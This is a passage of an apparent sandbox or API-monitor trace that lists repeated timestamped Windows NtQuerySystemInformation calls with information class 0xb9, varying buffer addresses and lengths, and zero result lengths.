NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0226.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.597] NtQuerySystemInformation 